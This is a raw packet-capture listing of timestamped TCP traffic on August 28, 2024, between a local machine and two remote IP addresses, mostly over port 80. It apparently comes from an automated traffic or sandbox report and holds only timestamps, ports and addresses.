                                                      Aug 28, 2024 06:57:03.905721903 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.905733109 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.905742884 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.905771971 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.905785084 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.905796051 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.905801058 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.905811071 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.905823946 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.905901909 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.905913115 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.905925989 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.905945063 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.905947924 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.905978918 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.905981064 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.905992985 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906008005 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906030893 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.906207085 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906219006 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906228065 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906239986 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906248093 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.906251907 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906265020 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906271935 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.906275988 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906303883 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.906347990 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906358004 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906373978 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906379938 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.906384945 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906397104 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906413078 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.906449080 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906461000 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906470060 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906481028 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906490088 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.906491995 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906510115 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.906671047 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906681061 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906689882 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906702042 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906708002 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.906733990 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906749964 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906759977 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906768084 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.906769991 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906781912 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906801939 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.906806946 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906816959 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906835079 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.906845093 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.906882048 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906898975 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906912088 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906923056 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.906936884 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.906958103 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.906965971 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.907776117 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.907788038 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.907798052 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.907809973 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.907835960 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.907851934 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.907856941 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.907867908 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.907905102 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.908013105 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.908024073 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.908032894 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.908045053 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.908055067 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.908056021 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.908070087 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.908080101 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.908082962 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.908098936 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.908157110 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.908169031 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.908186913 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.908198118 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.908240080 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.908251047 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.908262968 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.908273935 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.908291101 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.908294916 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.908303976 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.908335924 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.943083048 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.992158890 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992207050 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992224932 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992237091 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992247105 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992255926 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.992266893 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992280006 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992305040 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.992305040 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.992343903 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992394924 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.992497921 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992511034 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992521048 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992532969 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992536068 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.992543936 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992556095 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992563963 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.992568016 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992584944 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.992588043 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992603064 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992614031 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992624998 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992631912 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.992636919 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992659092 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.992746115 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992754936 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992763996 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992774963 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992786884 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992789984 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.992811918 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.992887020 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992898941 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992933035 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.992940903 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992954016 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992964029 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992980957 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.992981911 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.992997885 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993010044 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993014097 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.993021965 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993043900 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.993091106 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993102074 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993112087 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993122101 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993133068 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993136883 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.993155956 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.993163109 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993201971 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.993233919 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993244886 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993254900 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993266106 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993275881 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.993298054 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.993333101 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993344069 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993354082 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993365049 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993375063 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.993396997 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.993446112 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993458033 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993468046 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993486881 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.993532896 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993545055 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993554115 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993576050 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.993669033 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993680954 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993690968 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993702888 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993714094 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.993716955 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993731976 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993741989 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.993751049 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993767023 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.993804932 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993815899 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993824005 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993837118 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993846893 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.993870020 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.993951082 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993963003 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993974924 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993987083 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.993990898 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.994021893 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.994050026 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.994061947 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.994071007 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:03.994092941 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:03.994168997 CEST8049177192.3.193.155192.168.2.22
Aug 28, 2024 06:57:03.994180918 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.994190931 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.994213104 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:03.994311094 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.994323969 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.994332075 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.994342089 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.994349957 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:03.994353056 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.994364977 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.994373083 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:03.994374990 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.994389057 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:03.994446993 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.994488955 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:03.994498014 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.994508982 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.994518042 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.994540930 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:03.994632959 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.994642973 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.994652987 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.994672060 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:03.994740009 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.994751930 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.994761944 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.994782925 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:03.994860888 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.994873047 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.994905949 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:03.995381117 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.995395899 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.995404959 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.995424032 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:03.995445013 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.995456934 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.995466948 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.995477915 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.995480061 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:03.995501995 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:03.995630026 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.995640993 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.995651007 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.995661974 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.995671034 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:03.995671988 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.995685101 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.995692968 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:03.995697021 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.995721102 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:03.995737076 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.995778084 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:03.995790958 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.995803118 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.995832920 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:03.995876074 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.995887995 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.995898008 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.995909929 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:03.995914936 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:03.995944977 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.016217947 CEST  14645  49170  192.3.64.135  192.168.2.22
Aug 28, 2024 06:57:04.017879009 CEST  49170  14645  192.168.2.22  192.3.64.135
Aug 28, 2024 06:57:04.022762060 CEST  14645  49170  192.3.64.135  192.168.2.22
Aug 28, 2024 06:57:04.079391956 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.079404116 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.079420090 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.079437017 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.079447985 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.079458952 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.079464912 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.079477072 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.079488039 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.079500914 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.079503059 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.079515934 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.079547882 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.079560041 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.079581022 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.079591036 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.079628944 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.079668045 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.079683065 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.079693079 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.079706907 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.079720020 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.079725027 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.079746008 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.079813004 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.079823971 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.079833031 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.079843998 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.079854012 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.079854965 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.079876900 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.079894066 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.079932928 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.079997063 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080044985 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080056906 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080087900 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.080130100 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080140114 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080148935 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080159903 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080168962 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080168962 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.080188036 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.080271006 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080286980 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080297947 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080310106 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.080343008 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.080353975 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080364943 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080374002 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080387115 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080394983 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.080415010 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.080451012 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080461979 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080487967 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.080527067 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080537081 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080547094 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080557108 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080565929 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.080585003 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.080630064 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080640078 CEST  80  49177  192.3.193.155  192.168.2.22
